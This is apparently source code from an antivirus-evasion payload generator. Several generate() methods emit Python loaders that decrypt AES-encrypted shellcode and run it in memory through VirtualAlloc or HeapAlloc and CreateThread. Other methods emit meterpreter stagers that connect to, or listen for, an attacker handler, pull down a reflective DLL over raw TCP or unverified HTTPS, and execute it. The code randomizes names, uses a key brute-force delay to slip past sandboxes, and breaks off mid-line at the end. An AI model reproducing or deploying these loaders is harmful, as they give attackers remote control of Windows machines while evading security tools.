def generate(self): # Generate the variable names randctypes = evasion_helpers.randomString() ShellcodeVariableName = evasion_helpers.randomString() rand_ptr = evasion_helpers.randomString() rand_ht = evasion_helpers.randomString() RandEncShellCodePayload = evasion_helpers.randomString() RandCipherObject = evasion_helpers.randomString() rand_virtual_protect = evasion_helpers.randomString() # Generate the shellcode if not self.cli_shellcode: Shellcode = self.shellcode.generate(self.cli_opts) if self.shellcode.msfvenompayload: self.payload_type = self.shellcode.msfvenompayload elif self.shellcode.payload_choice: self.payload_type = self.shellcode.payload_choice self.shellcode.payload_choice = "" # assume custom shellcode else: self.payload_type = 'custom' else: Shellcode = self.cli_shellcode Shellcode = Shellcode.encode('latin-1') Shellcode = Shellcode.decode('unicode_escape') payload_code, num_tabs_required = gamemaker.senecas_games(self) # encrypt the shellcode and get our randomized key encoded_ciphertext, encryption_key, iv_value = encryption.aes_encryption( Shellcode) encoded_ciphertext = encoded_ciphertext.decode('ascii') if self.required_options["INJECT_METHOD"][0].lower() == "virtual": # Create Payload code payload_code += '\t' * num_tabs_required + 'import ctypes as ' + randctypes + '\n' payload_code += '\t' * num_tabs_required + 'from Crypto.Cipher import AES\n' payload_code += '\t' * num_tabs_required + 'import base64\n' payload_code += '\t' * num_tabs_required + RandCipherObject + ' = AES.new(\'' + encryption_key + '\', AES.MODE_CBC, \'' + iv_value + '\')\n' payload_code += '\t' * num_tabs_required + RandEncShellCodePayload + ' = base64.b64decode(\'' + encoded_ciphertext + '\')\n' payload_code += '\t' * num_tabs_required + ShellcodeVariableName + ' = ' + RandCipherObject + '.decrypt(' + RandEncShellCodePayload + ')\n' payload_code += '\t' * num_tabs_required + rand_ptr + ' = ' + randctypes + '.windll.kernel32.VirtualAlloc(' + randctypes + '.c_int(0),' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')),' + randctypes + '.c_int(0x3000),' + randctypes + '.c_int(0x04))\n' payload_code += '\t' * num_tabs_required + randctypes + '.windll.kernel32.RtlMoveMemory(' + randctypes + '.c_int(' + rand_ptr + '),' + ShellcodeVariableName + ',' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')))\n' payload_code += '\t' * num_tabs_required + rand_virtual_protect + ' = ' + randctypes + '.windll.kernel32.VirtualProtect(' + randctypes + '.c_int(' + rand_ptr + '),' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')),' + randctypes + '.c_int(0x20),' + randctypes + '.byref(' + randctypes + '.c_uint32(0)))\n' payload_code += '\t' * num_tabs_required + rand_ht + ' = ' + randctypes + '.windll.kernel32.CreateThread(' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.c_int(' + rand_ptr + '),' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.pointer(' + randctypes + '.c_int(0)))\n' payload_code += '\t' * num_tabs_required + randctypes + '.windll.kernel32.WaitForSingleObject(' + randctypes + '.c_int(' + rand_ht + '),' + randctypes + '.c_int(-1))\n' elif self.required_options["INJECT_METHOD"][0].lower() == "heap": HeapVar = evasion_helpers.randomString() # Create Payload code payload_code += '\t' * num_tabs_required + 'import ctypes as ' + randctypes + '\n' payload_code += '\t' * num_tabs_required + 'from Crypto.Cipher import AES\n' payload_code += '\t' * num_tabs_required + 'import base64\n' payload_code += '\t' * num_tabs_required + RandCipherObject + ' = AES.new(\'' + encryption_key + '\', AES.MODE_CBC, \'' + iv_value + '\')\n' payload_code += '\t' * num_tabs_required + RandEncShellCodePayload + ' = base64.b64decode(\'' + encoded_ciphertext + '\')\n' payload_code += '\t' * num_tabs_required + ShellcodeVariableName + ' = ' + RandCipherObject + '.decrypt(' + RandEncShellCodePayload + ')\n' payload_code += '\t' * num_tabs_required + HeapVar + ' = ' + randctypes + '.windll.kernel32.HeapCreate(' + randctypes + '.c_int(0x00040000),' + randctypes + '.c_int(len(' + ShellcodeVariableName + ') * 2),' + randctypes + '.c_int(0))\n' payload_code += '\t' * num_tabs_required + rand_ptr + ' = ' + randctypes + '.windll.kernel32.HeapAlloc(' + randctypes + '.c_int(' + HeapVar + '),' + randctypes + '.c_int(0x00000008),' + randctypes + '.c_int(len( ' + ShellcodeVariableName + ')))\n' payload_code += '\t' * num_tabs_required + randctypes + '.windll.kernel32.RtlMoveMemory(' + randctypes + '.c_int(' + rand_ptr + '),' + ShellcodeVariableName + ',' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')))\n' payload_code += '\t' * num_tabs_required + rand_ht + ' = ' + randctypes + '.windll.kernel32.CreateThread(' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.c_int(' + rand_ptr + '),' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.pointer(' + randctypes + '.c_int(0)))\n' payload_code += '\t' * num_tabs_required + randctypes + '.windll.kernel32.WaitForSingleObject(' + randctypes + '.c_int(' + rand_ht + '),' + randctypes + '.c_int(-1))\n' if self.required_options["USE_PYHERION"][0].lower() == "y": payload_code = encryption.pyherion(payload_code) self.payload_source_code = payload_code return
def generate(self): # randomize all of the variable names used shellCodeName = evasion_helpers.randomString() socketName = evasion_helpers.randomString() clientSocketName = evasion_helpers.randomString() getDataMethodName = evasion_helpers.randomString() fdBufName = evasion_helpers.randomString() rcvStringName = evasion_helpers.randomString() rcvCStringName = evasion_helpers.randomString() injectMethodName = evasion_helpers.randomString() tempShellcodeName = evasion_helpers.randomString() shellcodeBufName = evasion_helpers.randomString() fpName = evasion_helpers.randomString() tempCBuffer = evasion_helpers.randomString() payload_code = "import struct, socket, binascii, ctypes, random, time\n" # socket and shellcode variables that need to be kept global payload_code += "%s, %s = None, None\n" % (shellCodeName,socketName) # build the method that creates a socket, connects to the handler, # and downloads/patches the meterpreter .dll payload_code += "def %s():\n" %(getDataMethodName) payload_code += "\ttry:\n" payload_code += "\t\tglobal %s\n" %(socketName) payload_code += "\t\tglobal %s\n" %(clientSocketName) # build the socket and connect to the handler payload_code += "\t\t%s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n" %(socketName) payload_code += "\t\t%s.bind(('%s', %s))\n" %(socketName,self.required_options["RHOST"][0], str(self.required_options["LPORT"][0])) payload_code += "\t\t%s.listen(1)\n" % (socketName) payload_code += "\t\t%s,_ = %s.accept()\n" % (clientSocketName, socketName) # pack the underlying socket file descriptor into a c structure payload_code += "\t\t%s = struct.pack('<i', %s.fileno())\n" % (fdBufName,clientSocketName) # unpack the length of the payload, received as a 4 byte array from the handler payload_code += "\t\tl = struct.unpack('<i', %s.recv(4))[0]\n" %(clientSocketName) payload_code += "\t\t" + rcvStringName + " = b\" \"\n" # receive ALL of the payload .dll data payload_code += "\t\twhile len(%s) < l: %s += %s.recv(l)\n" % (rcvStringName, rcvStringName, clientSocketName) payload_code += "\t\t%s = ctypes.create_string_buffer(%s, len(%s))\n" % (rcvCStringName,rcvStringName,rcvStringName) # prepend a little assembly magic to push the socket fd into the edi register payload_code += "\t\t%s[0] = binascii.unhexlify('BF')\n" %(rcvCStringName) # copy the socket fd in payload_code += "\t\tfor i in range(4): %s[i+1] = %s[i]\n" % (rcvCStringName, fdBufName) payload_code += "\t\treturn %s\n" % (rcvCStringName) payload_code += "\texcept: return None\n" # build the method that injects the .dll into memory payload_code += "def %s(%s):\n" %(injectMethodName,tempShellcodeName) payload_code += "\tif %s != None:\n" %(tempShellcodeName) payload_code += "\t\t%s = bytearray(%s)\n" %(shellcodeBufName,tempShellcodeName) # allocate enough virtual memory to stuff the .dll in payload_code += "\t\t%s = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(%s)),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n" %(fpName,shellcodeBufName) # virtual lock to prevent the memory from paging out to disk payload_code += "\t\tctypes.windll.kernel32.VirtualLock(ctypes.c_int(%s), ctypes.c_int(len(%s)))\n" %(fpName,shellcodeBufName) payload_code += "\t\t%s = (ctypes.c_char * len(%s)).from_buffer(%s)\n" %(tempCBuffer,shellcodeBufName,shellcodeBufName) # copy the .dll into the allocated memory payload_code += "\t\tctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(%s), %s, ctypes.c_int(len(%s)))\n" %(fpName,tempCBuffer,shellcodeBufName) # kick the thread off to execute the .dll payload_code += "\t\tht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(%s),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n" %(fpName) # wait for the .dll execution to finish payload_code += "\t\tctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht),ctypes.c_int(-1))\n" # download the stager payload_code += "%s = %s()\n" %(shellCodeName, getDataMethodName) # inject what we grabbed payload_code += "%s(%s)\n" % (injectMethodName,shellCodeName) if self.required_options["USE_PYHERION"][0].lower() == "y": payload_code = encryption.pyherion(payload_code) self.payload_source_code = payload_code return
def generate(self): # randomize everything, yo' sumMethodName = evasion_helpers.randomString() checkinMethodName = evasion_helpers.randomString() randLettersName = evasion_helpers.randomString() randLetterSubName = evasion_helpers.randomString() randBaseName = evasion_helpers.randomString() downloadMethodName = evasion_helpers.randomString() hostName = evasion_helpers.randomString() portName = evasion_helpers.randomString() requestName = evasion_helpers.randomString() tName = evasion_helpers.randomString() injectMethodName = evasion_helpers.randomString() dataName = evasion_helpers.randomString() byteArrayName = evasion_helpers.randomString() ptrName = evasion_helpers.randomString() bufName = evasion_helpers.randomString() handleName = evasion_helpers.randomString() data2Name = evasion_helpers.randomString() proxy_var = evasion_helpers.randomString() opener_var = evasion_helpers.randomString() randctypes = evasion_helpers.randomString() # How I'm tracking the number of nested tabs needed # to make the payload num_tabs_required = 0 payload_code = "import urllib.request, string, random, struct, time, ssl, ctypes as " + randctypes + "\n" payload_code2, num_tabs_required = gamemaker.senecas_games(self) payload_code = payload_code + payload_code2 # helper method that returns the sum of all ord values in a string % 0x100 payload_code += '\t' * num_tabs_required + "ssl._create_default_https_context = ssl._create_unverified_context\n" payload_code += '\t' * num_tabs_required + "def %s(s): return sum([ord(ch) for ch in s]) %% 0x100\n" %(sumMethodName) # method that generates a new checksum value for checkin to the meterpreter handler payload_code += '\t' * num_tabs_required + "def %s():\n" %(checkinMethodName) payload_code += '\t' * num_tabs_required + "\tfor x in range(64):\n" payload_code += '\t' * num_tabs_required + "\t\t%s = ''.join(random.sample(string.ascii_letters + string.digits,3))\n" %(randBaseName) payload_code += '\t' * num_tabs_required + "\t\t%s = ''.join(sorted(list(string.ascii_letters+string.digits), key=lambda *args: random.random()))\n" %(randLettersName) payload_code += '\t' * num_tabs_required + "\t\tfor %s in %s:\n" %(randLetterSubName, randLettersName) payload_code += '\t' * num_tabs_required + "\t\t\tif %s(%s + %s) == 92: return %s + %s\n" %(sumMethodName, randBaseName, randLetterSubName, randBaseName, randLetterSubName) # method that connects to a host/port over https and downloads the hosted data payload_code += '\t' * num_tabs_required + "def %s(%s,%s):\n" %(downloadMethodName, hostName, portName) payload_code += '\t' * num_tabs_required + "\t" + proxy_var + " = urllib.request.ProxyHandler({})\n" payload_code += '\t' * num_tabs_required + "\t" + opener_var + " = urllib.request.build_opener(" + proxy_var + ")\n" payload_code += '\t' * num_tabs_required + "\turllib.request.install_opener(" + opener_var + ")\n" payload_code += '\t' * num_tabs_required + '\t' + requestName + " = urllib.request.Request(\"https://\" + " + hostName + " + \":\" + str(" + portName + ") + \"/\" + " + checkinMethodName + "(), None, {'User-Agent' : 'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)'})\n" payload_code += '\t' * num_tabs_required + "\ttry:\n" payload_code += '\t' * num_tabs_required + "\t\t%s = urllib.request.urlopen(%s)\n" %(tName, requestName) payload_code += '\t' * num_tabs_required + "\t\ttry:\n" payload_code += '\t' * num_tabs_required + "\t\t\tif int(%s.info()[\"Content-Length\"]) > 100000: return %s.read()\n" %(tName, tName) payload_code += '\t' * num_tabs_required + "\t\t\telse: return ''\n" payload_code += '\t' * num_tabs_required + "\t\texcept: return %s.read()\n" % (tName) payload_code += '\t' * num_tabs_required + "\texcept urllib.request.URLError: return ''\n" # method to inject a reflective .dll into memory payload_code += '\t' * num_tabs_required + "def %s(%s):\n" %(injectMethodName, dataName) payload_code += '\t' * num_tabs_required + "\tif %s != \"\":\n" %(dataName) payload_code += '\t' * num_tabs_required + "\t\t%s = bytearray(%s)\n" %(byteArrayName, dataName) if self.required_options["INJECT_METHOD"][0].lower() == "virtual": payload_code += '\t' * num_tabs_required + "\t\t" + ptrName + " = " + randctypes + ".windll.kernel32.VirtualAlloc(" + randctypes + ".c_int(0)," + randctypes + ".c_int(len(" + byteArrayName + ")), " + randctypes + ".c_int(0x3000)," + randctypes + ".c_int(0x40))\n" payload_code += '\t' * num_tabs_required + "\t\t" + bufName + " = (" + randctypes + ".c_char * len(" + byteArrayName + ")).from_buffer(" + byteArrayName + ")\n" payload_code += '\t' * num_tabs_required + "\t\t" + randctypes + ".windll.kernel32.RtlMoveMemory(" + randctypes + ".c_int(" + ptrName + ")," + bufName + ", " + randctypes + ".c_int(len(" + byteArrayName + ")))\n" payload_code += '\t' * num_tabs_required + "\t\t" + handleName + " = " + randctypes + ".windll.kernel32.CreateThread(" + randctypes + ".c_int(0)," + randctypes + ".c_int(0)," + randctypes + ".c_int(" + ptrName + ")," + randctypes + ".c_int(0)," + randctypes + ".c_int(0)," + randctypes + ".pointer(" + randctypes + ".c_int(0)))\n" payload_code += '\t' * num_tabs_required + "\t\t" + randctypes + ".windll.kernel32.WaitForSingleObject(" + randctypes + ".c_int(" + handleName + ")," + randctypes + ".c_int(-1))\n" # Assuming heap injection else: HeapVar = evasion_helpers.randomString() payload_code += '\t' * num_tabs_required + "\t\t" + HeapVar + ' = ' + randctypes + '.windll.kernel32.HeapCreate(' + randctypes + '.c_int(0x00040000),' + randctypes + '.c_int(len(' + byteArrayName + ') * 2),' + randctypes + '.c_int(0))\n' payload_code += '\t' * num_tabs_required + "\t\t" + ptrName + ' = ' + randctypes + '.windll.kernel32.HeapAlloc(' + randctypes + '.c_int(' + HeapVar + '),' + randctypes + '.c_int(0x00000008),' + randctypes + '.c_int(len( ' + byteArrayName + ')))\n' payload_code += '\t' * num_tabs_required + "\t\t" + bufName + ' = (' + randctypes + '.c_char * len(' + byteArrayName + ')).from_buffer(' + byteArrayName + ')\n' payload_code += '\t' * num_tabs_required + "\t\t" + randctypes + '.windll.kernel32.RtlMoveMemory(' + randctypes + '.c_int(' + ptrName + '),' + bufName + ',' + randctypes + '.c_int(len(' + byteArrayName + ')))\n' payload_code += '\t' * num_tabs_required + "\t\t" + handleName + ' = ' + randctypes + '.windll.kernel32.CreateThread(' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.c_int(' + ptrName + '),' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.pointer(' + randctypes + '.c_int(0)))\n' payload_code += '\t' * num_tabs_required + "\t\t" + randctypes + '.windll.kernel32.WaitForSingleObject(' + randctypes + '.c_int(' + handleName + '),' + randctypes + '.c_int(-1))\n' # download the metpreter .dll and inject it payload_code += '\t' * num_tabs_required + "%s = ''\n" %(data2Name) payload_code += '\t' * num_tabs_required + "%s = %s(\"%s\", %s)\n" %(data2Name, downloadMethodName, self.required_options["LHOST"][0], self.required_options["LPORT"][0]) payload_code += '\t' * num_tabs_required + "%s(%s)\n" %(injectMethodName, data2Name) if self.required_options["USE_PYHERION"][0].lower() == "y": payload_code = encryption.pyherion(payload_code) self.payload_source_code = payload_code return
def generate(self): # randomize all of the variable names used shellCodeName = evasion_helpers.randomString() socketName = evasion_helpers.randomString() getDataMethodName = evasion_helpers.randomString() fdBufName = evasion_helpers.randomString() rcvStringName = evasion_helpers.randomString() rcvCStringName = evasion_helpers.randomString() injectMethodName = evasion_helpers.randomString() tempShellcodeName = evasion_helpers.randomString() shellcodeBufName = evasion_helpers.randomString() fpName = evasion_helpers.randomString() tempCBuffer = evasion_helpers.randomString() randctypes = evasion_helpers.randomString() payload_code = "import struct, socket, binascii, ctypes as " + randctypes + ", random, time\n" # How I'm tracking the number of nested tabs needed # to make the payload num_tabs_required = 0 payload_code2, num_tabs_required = gamemaker.senecas_games(self) payload_code = payload_code + payload_code2 # socket and shellcode variables that need to be kept global payload_code += '\t' * num_tabs_required + "%s, %s = None, None\n" % ( shellCodeName, socketName) # build the method that creates a socket, connects to the handler, # and downloads/patches the meterpreter .dll payload_code += '\t' * num_tabs_required + "def %s():\n" % ( getDataMethodName) payload_code += '\t' * num_tabs_required + "\ttry:\n" payload_code += '\t' * num_tabs_required + "\t\tglobal %s\n" % ( socketName) # build the socket and connect to the handler payload_code += '\t' * num_tabs_required + "\t\t%s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n" % ( socketName) payload_code += '\t' * num_tabs_required + "\t\t%s.connect(('%s', %s))\n" % ( socketName, self.required_options["LHOST"][0], self.required_options["LPORT"][0]) # pack the underlying socket file descriptor into a c structure payload_code += '\t' * num_tabs_required + "\t\t%s = struct.pack('<i', %s.fileno())\n" % ( fdBufName, socketName) # unpack the length of the payload, received as a 4 byte array from the handler payload_code += '\t' * num_tabs_required + "\t\tl = struct.unpack('<i', %s.recv(4))[0]\n" % ( socketName) payload_code += '\t' * num_tabs_required + "\t\t%s = b\" \"\n" % ( rcvStringName) # receive ALL of the payload .dll data payload_code += '\t' * num_tabs_required + "\t\twhile len(%s) < l: %s += %s.recv(l)\n" % ( rcvStringName, rcvStringName, socketName) payload_code += '\t' * num_tabs_required + "\t\t" + rcvCStringName + " = " + randctypes + ".create_string_buffer(%s, len(%s))\n" % ( rcvStringName, rcvStringName) # prepend a little assembly magic to push the socket fd into the edi register payload_code += '\t' * num_tabs_required + "\t\t%s[0] = binascii.unhexlify('BF')\n" % ( rcvCStringName) # copy the socket fd in payload_code += '\t' * num_tabs_required + "\t\tfor i in range(4): %s[i+1] = %s[i]\n" % ( rcvCStringName, fdBufName) payload_code += '\t' * num_tabs_required + "\t\treturn %s\n" % ( rcvCStringName) payload_code += '\t' * num_tabs_required + "\texcept: return None\n" # build the method that injects the .dll into memory payload_code += '\t' * num_tabs_required + "def %s(%s):\n" % ( injectMethodName, tempShellcodeName) payload_code += '\t' * num_tabs_required + "\tif %s != None:\n" % ( tempShellcodeName) payload_code += '\t' * num_tabs_required + "\t\t%s = bytearray(%s)\n" % ( shellcodeBufName, tempShellcodeName) if self.required_options["INJECT_METHOD"][0].lower() == "virtual": # allocate enough virtual memory to stuff the .dll in payload_code += "\t\t" + fpName + " = " + randctypes + ".windll.kernel32.VirtualAlloc(" + randctypes + ".c_int(0)," + randctypes + ".c_int(len(" + shellcodeBufName + "))," + randctypes + ".c_int(0x3000)," + randctypes + ".c_int(0x40))\n" # virtual lock to prevent the memory from paging out to disk payload_code += "\t\t" + tempCBuffer + " = (" + randctypes + ".c_char * len(" + shellcodeBufName + ")).from_buffer(" + shellcodeBufName + ")\n" # copy the .dll into the allocated memory payload_code += "\t\t" + randctypes + ".windll.kernel32.RtlMoveMemory(" + randctypes + ".c_int(" + fpName + "), " + tempCBuffer + ", " + randctypes + ".c_int(len(" + shellcodeBufName + ")))\n" # kick the thread off to execute the .dll payload_code += "\t\tht = " + randctypes + ".windll.kernel32.CreateThread(" + randctypes + ".c_int(0)," + randctypes + ".c_int(0)," + randctypes + ".c_int(" + fpName + ")," + randctypes + ".c_int(0)," + randctypes + ".c_int(0)," + randctypes + ".pointer(" + randctypes + ".c_int(0)))\n" # wait for the .dll execution to finish payload_code += "\t\t" + randctypes + ".windll.kernel32.WaitForSingleObject(" + randctypes + ".c_int(ht)," + randctypes + ".c_int(-1))\n" # Assume HEAP Injection else: HeapVar = evasion_helpers.randomString() handleName = evasion_helpers.randomString() payload_code += '\t' * num_tabs_required + "\t\t" + HeapVar + ' = ' + randctypes + '.windll.kernel32.HeapCreate(' + randctypes + '.c_int(0x00040000),' + randctypes + '.c_int(len(' + shellcodeBufName + ') * 2),' + randctypes + '.c_int(0))\n' payload_code += '\t' * num_tabs_required + "\t\t" + fpName + ' = ' + randctypes + '.windll.kernel32.HeapAlloc(' + randctypes + '.c_int(' + HeapVar + '),' + randctypes + '.c_int(0x00000008),' + randctypes + '.c_int(len( ' + shellcodeBufName + ')))\n' payload_code += '\t' * num_tabs_required + "\t\t" + tempCBuffer + ' = (' + randctypes + '.c_char * len(' + shellcodeBufName + ')).from_buffer(' + shellcodeBufName + ')\n' payload_code += '\t' * num_tabs_required + "\t\t" + randctypes + '.windll.kernel32.RtlMoveMemory(' + randctypes + '.c_int(' + fpName + '),' + tempCBuffer + ',' + randctypes + '.c_int(len(' + shellcodeBufName + ')))\n' payload_code += '\t' * num_tabs_required + "\t\t" + handleName + ' = ' + randctypes + '.windll.kernel32.CreateThread(' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.c_int(' + fpName + '),' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.pointer(' + randctypes + '.c_int(0)))\n' payload_code += '\t' * num_tabs_required + "\t\t" + randctypes + '.windll.kernel32.WaitForSingleObject(' + randctypes + '.c_int(' + handleName + '),' + randctypes + '.c_int(-1))\n' # download the stager payload_code += '\t' * num_tabs_required + "%s = %s()\n" % ( shellCodeName, getDataMethodName) # inject what we grabbed payload_code += '\t' * num_tabs_required + "%s(%s)\n" % ( injectMethodName, shellCodeName) if self.required_options["USE_PYHERION"][0].lower() == "y": payload_code = encryption.pyherion(payload_code) self.payload_source_code = payload_code return
def generate(self): # Generate the variable names randctypes = evasion_helpers.randomString() ShellcodeVariableName = evasion_helpers.randomString() rand_ptr = evasion_helpers.randomString() rand_ht = evasion_helpers.randomString() known_plaintext_string = evasion_helpers.randomString() key_guess = evasion_helpers.randomString() secret_key = evasion_helpers.randomString() small_constrained_key_variable = evasion_helpers.randomString() decoded_ciphertext = evasion_helpers.randomString() decoded_known = evasion_helpers.randomString() decoded_shellcode = evasion_helpers.randomString() RandCipherObject = evasion_helpers.randomString() RandPadding = evasion_helpers.randomString() rand_virtual_protect = evasion_helpers.randomString() # Generate the shellcode if not self.cli_shellcode: Shellcode = self.shellcode.generate(self.cli_opts) if self.shellcode.msfvenompayload: self.payload_type = self.shellcode.msfvenompayload elif self.shellcode.payload_choice: self.payload_type = self.shellcode.payload_choice self.shellcode.payload_choice = '' # assume custom shellcode else: self.payload_type = 'custom' else: Shellcode = self.cli_shellcode payload_code, num_tabs_required = gamemaker.senecas_games(self) # encrypt the shellcode and get our randomized key encoded_ciphertext, constrained_key, encryption_key = encryption.constrained_aes(Shellcode) encoded_ciphertext = encoded_ciphertext.decode('ascii') # Use the secret we received earlier to encrypt our known plaintext string encrypted_plaintext_string = encryption.known_plaintext(encryption_key, known_plaintext_string) encrypted_plaintext_string = encrypted_plaintext_string.decode('ascii') if self.required_options["INJECT_METHOD"][0].lower() == "virtual": # Create Payload code payload_code += '\t' * num_tabs_required + 'import ctypes as ' + randctypes + '\n' payload_code += '\t' * num_tabs_required + 'from Crypto.Cipher import AES\n' payload_code += '\t' * num_tabs_required + 'import base64\n' payload_code += '\t' * num_tabs_required + 'import os\n' payload_code += '\t' * num_tabs_required + small_constrained_key_variable + ' = \'' + constrained_key + '\'\n' payload_code += '\t' * num_tabs_required + RandPadding + ' = \'*\'\n' payload_code += '\t' * num_tabs_required + 'for ' + key_guess + ' in range(1000000, 10000000):\n' payload_code += '\t' * num_tabs_required + '\t' + secret_key + " = \"" + constrained_key + '\" + str(' + key_guess + ')\n' payload_code += '\t' * num_tabs_required + '\t' + RandCipherObject + ' = AES.new(' + secret_key + ', AES.MODE_ECB)\n' payload_code += '\t' * num_tabs_required + '\t' + decoded_ciphertext + ' = base64.b64decode(\'' + encrypted_plaintext_string + '\')\n' payload_code += '\t' * num_tabs_required + '\ttry:\n' payload_code += '\t' * num_tabs_required + '\t\t' + decoded_known + ' = ' + RandCipherObject + '.decrypt(' + decoded_ciphertext + ').decode(\'ascii\')\n' payload_code += '\t' * num_tabs_required + '\t\t' + 'if ' + decoded_known + '.rstrip(\'*\') == \'' + known_plaintext_string + '\':\n' payload_code += '\t' * num_tabs_required + '\t\t\t' + decoded_shellcode + ' = base64.b64decode(\'' + encoded_ciphertext + '\')\n' payload_code += '\t' * num_tabs_required + '\t\t\t' + ShellcodeVariableName + ' = ' + RandCipherObject + '.decrypt(' + decoded_shellcode + ')\n' payload_code += '\t' * num_tabs_required + '\t\t\t' + rand_ptr + ' = ' + randctypes + '.windll.kernel32.VirtualAlloc(' + randctypes + '.c_int(0),' + randctypes + '.c_int(len('+ ShellcodeVariableName +')),' + randctypes + '.c_int(0x3000),' + randctypes + '.c_int(0x04))\n' payload_code += '\t' * num_tabs_required + '\t\t\t' + randctypes + '.windll.kernel32.RtlMoveMemory(' + randctypes + '.c_int(' + rand_ptr + '),' + ShellcodeVariableName + ',' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')))\n' payload_code += '\t' * num_tabs_required + '\t\t\t' + rand_virtual_protect + ' = ' + randctypes + '.windll.kernel32.VirtualProtect(' + randctypes + '.c_int(' + rand_ptr + '),' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')),' + randctypes + '.c_int(0x20),' + randctypes + '.byref(' + randctypes + '.c_uint32(0)))\n' payload_code += '\t' * num_tabs_required + '\t\t\t' + rand_ht + ' = ' + randctypes + '.windll.kernel32.CreateThread(' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.c_int(' + rand_ptr + '),' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.pointer(' + randctypes + '.c_int(0)))\n' payload_code += '\t' * num_tabs_required + '\t\t\t' + randctypes + '.windll.kernel32.WaitForSingleObject(' + randctypes + '.c_int(' + rand_ht + '),' + randctypes + '.c_int(-1))\n' payload_code += '\t' * num_tabs_required + '\texcept:\n' payload_code += '\t' * num_tabs_required + '\t\tpass' elif self.required_options["INJECT_METHOD"][0].lower() == "heap": HeapVar = evasion_helpers.randomString() payload_code += '\t' * num_tabs_required + 'import ctypes as ' + randctypes + '\n' payload_code += '\t' * num_tabs_required + 'from Crypto.Cipher import AES\n' payload_code += '\t' * num_tabs_required + 'import base64\n' payload_code += '\t' * num_tabs_required + 'import os\n' payload_code += '\t' * num_tabs_required + small_constrained_key_variable + ' = \'' + constrained_key + '\'\n' payload_code += '\t' * num_tabs_required + RandPadding + ' = \'*\'\n' payload_code += '\t' * num_tabs_required + 'for ' + key_guess + ' in range(1000000, 10000000):\n' payload_code += '\t' * num_tabs_required + '\t' + secret_key + " = \'" + constrained_key + '\' + str(' + key_guess + ')\n' payload_code += '\t' * num_tabs_required + '\t' + RandCipherObject + ' = AES.new(' + encryption_key + ', AES.MODE_ECB)\n' payload_code += '\t' * num_tabs_required + '\t' + decoded_ciphertext + ' = base64.b64decode(\'' + encrypted_plaintext_string + '\')\n' payload_code += '\t' * num_tabs_required + '\t' + decoded_known + ' = ' + RandCipherObject + '.decrypt(' + decoded_ciphertext + ').decode(\'ascii\')\n' payload_code += '\t' * num_tabs_required + '\t' + 'if ' + decoded_known + '.rstrip(\'*\') == \'' + known_plaintext_string + '\':\n' payload_code += '\t' * num_tabs_required + '\t\t' + decoded_shellcode + ' = base64.b64decode(\'' + encoded_ciphertext + '\')\n' payload_code += '\t' * num_tabs_required + '\t\t' + ShellcodeVariableName + ' = ' + RandCipherObject + '.decrypt(' + decoded_shellcode + ')\n' payload_code += '\t' * num_tabs_required + '\t\t' + HeapVar + ' = ' + randctypes + '.windll.kernel32.HeapCreate(' + randctypes + '.c_int(0x00040000),' + randctypes + '.c_int(len(' + ShellcodeVariableName + ') * 2),' + randctypes + '.c_int(0))\n' payload_code += '\t' * num_tabs_required + '\t\t' + rand_ptr + ' = ' + randctypes + '.windll.kernel32.HeapAlloc(' + randctypes + '.c_int(' + HeapVar + '),' + randctypes + '.c_int(0x00000008),' + randctypes + '.c_int(len( ' + ShellcodeVariableName + ')))\n' payload_code += '\t' * num_tabs_required + '\t\t' + randctypes + '.windll.kernel32.RtlMoveMemory(' + randctypes + '.c_int(' + rand_ptr + '),' + ShellcodeVariableName + ',' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')))\n' payload_code += '\t' * num_tabs_required + '\t\t' + rand_ht + ' = ' + randctypes + '.windll.kernel32.CreateThread(' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.c_int(' + rand_ptr + '),' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.pointer(' + randctypes + '.c_int(0)))\n' payload_code += '\t' * num_tabs_required + '\t\t' + randctypes + '.windll.kernel32.WaitForSingleObject(' + randctypes + '.c_int(' + rand_ht + '),' + randctypes + '.c_int(-1))\n' if self.required_options["USE_PYHERION"][0].lower() == "y": payload_code = encryption.pyherion(payload_code) self.payload_source_code = payload_code return
def generate(self): sumMethodName = evasion_helpers.randomString() checkinMethodName = evasion_helpers.randomString() randLettersName = evasion_helpers.randomString() randLetterSubName = evasion_helpers.randomString() randBaseName = evasion_helpers.randomString() downloadMethodName = evasion_helpers.randomString() hostName = evasion_helpers.randomString() portName = evasion_helpers.randomString() requestName = evasion_helpers.randomString() tName = evasion_helpers.randomString() injectMethodName = evasion_helpers.randomString() dataName = evasion_helpers.randomString() byteArrayName = evasion_helpers.randomString() ptrName = evasion_helpers.randomString() bufName = evasion_helpers.randomString() handleName = evasion_helpers.randomString() data2Name = evasion_helpers.randomString() proxy_var = evasion_helpers.randomString() opener_var = evasion_helpers.randomString() randctypes = evasion_helpers.randomString() payload_code = "import urllib.request, string, random, ctypes as " + randctypes + "\n" # How I'm tracking the number of nested tabs needed # to make the payload num_tabs_required = 0 payload_code2, num_tabs_required = 